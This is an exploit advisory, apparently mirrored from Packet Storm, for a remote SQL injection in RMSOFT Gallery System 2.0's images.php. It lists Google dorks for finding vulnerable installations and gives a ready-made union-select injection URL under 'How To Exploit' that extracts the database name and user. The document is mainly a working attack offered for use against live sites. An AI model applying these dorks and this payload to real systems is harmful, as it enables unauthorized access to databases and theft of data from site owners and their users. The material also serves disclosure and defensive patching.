RMSOFT Gallery System version 2.0 suffers from a SQL injection vulnerability in images.php.
642c6b6b03346e959b4fbfb2fb25c4f211fff0e0221aac67b77d30052d9694ba#=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=#
# ~Author: you_kn0w #
# ~Contact: you-know[at]linuxmail.org #
# ~Website: www.youknowz.info #
# ~Script: RRMSOFT Gallery #
# ~Bug: RRMSOFT Gallery Remote SQL Injection #
#=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=#
# Script Information #
#=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=#
# #
# Script name: RRMSOFT Gallery System #
# Script site: http://www.xoopsmexico.net #
# Script get: www.xoopsmexico.net/modules/rmdp#
# Description: PHP media gallery System #
# Version: 2.0 #
#=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=#
# [-]Dorks:
intext:Powered by RMSOFT GS 2.0
inurl:modules/rmgs/images.php
# [+]How To Exploit:
http://[target].com/[path]/modules/rmgs/images.php?q=user&id=1999/**/union/**/all/**/select/**/1,1,concat(database(),0x202D20,user()),1,1,1,1,0,1,0,1,0,1,1,0,0,0,0,0,1,1,0,0,0,1,1,1,0,1,0,0/*
# [+]Greetz:
Greetz to; ka0x - Celciuz - JosS - Phanter-Root & Screamo
//you_kn0w
#=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=#
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed